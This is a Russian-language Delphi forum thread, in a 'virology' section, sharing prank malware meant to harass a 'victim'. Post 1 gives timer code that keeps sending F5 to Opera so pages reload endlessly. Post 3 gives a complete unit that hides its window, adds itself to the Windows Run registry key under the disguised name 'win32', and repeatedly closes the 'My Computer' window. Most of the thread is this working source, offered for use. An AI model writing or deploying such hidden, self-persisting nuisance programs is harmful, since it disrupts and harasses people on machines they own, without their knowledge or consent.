Среда, 28.06.2017, 11:43 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Трепим нервы юзеру (opera)
Трепим нервы юзеру
okeДата: Четверг, 10.05.2012, 21:40 | Сообщение # 1
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
ставим таймер на 200 и вставляем

Code
procedure TForm1.Timer1Timer(Sender: TObject);
var
  h:HWND;
begin
   h:= FindWindow('OperaWindowClass',nil);
   if h<>0 then
   keybd_event(VK_F5, mapvirtualkey(vk_F5, 0), 0, 0);
   Sleep(20);
   keybd_event(vk_F5, mapvirtualkey(vk_F5, 0), keyeventf_keyup, 0)
end;


и когда жертва будет включать оперу то будет обновлятся страничка) а еще можно искать по имени например вк Иван Иванов ищем по имени Иван Иванов - Opera , или же как к нашем случае Вирусология, взгляд из Delphi - Главная страница - Opera если зайдете на гл страничку сайта то просто тупо будет обнавлятся и вы не сможете норм посидеть))
 
okeДата: Четверг, 10.05.2012, 21:41 | Сообщение # 2
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
можно убрать
Code
sleep(20)
 
toly19Дата: Суббота, 16.06.2012, 12:37 | Сообщение # 3
Был не раз
Зарегистрирован: 25.05.2012
Группа: Пользователи
Сообщений: 13
Статус: Offline
Code

unit Unit1;

interface

uses
   Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
   Dialogs, ExtCtrls,Registry;

type
   TForm1 = class(TForm)
     Timer1: TTimer;
     procedure Timer1Timer(Sender: TObject);
     procedure FormCreate(Sender: TObject);
   private
     { Private declarations }
   public
     { Public declarations }
   end;

var
   Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Timer1Timer(Sender: TObject);
var
h:hwnd;
s:pchar;
begin
//Сворачивает  Мой компьютер
s:='Мой компьютер';
h:=findwindow(nil,s);
if h<>null then
closewindow(h);
end;

procedure TForm1.FormCreate(Sender: TObject);
var Reg:TRegistry;
begin
//Невидимая форма
application.showmainform:= false;
  //Добавление в атозагрузку
Reg:=TRegIniFile.Create;
  Reg.RootKey:=HKEY_CURRENT_USER;
  Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',false);
  Reg.WriteString('win32',Application.ExeName);
  Reg.CloseKey;
  Reg.Free;
end;

end.


Сообщение отредактировал toly19 - Суббота, 16.06.2012, 12:38
 
Marra_KeshДата: Суббота, 16.06.2012, 13:56 | Сообщение # 4
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
Сюда Сюда шутки

Сообщение отредактировал Marra_Kesh - Суббота, 16.06.2012, 13:57
 
okeДата: Суббота, 16.06.2012, 18:07 | Сообщение # 5
Постоянный
Зарегистрирован: 15.01.2012
Группа: Пользователи
Сообщений: 124
Статус: Offline
toly19, зачем вообще форму создавать?
 
delfcode » Delphi » Вирусология Delphi » Трепим нервы юзеру (opera)
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz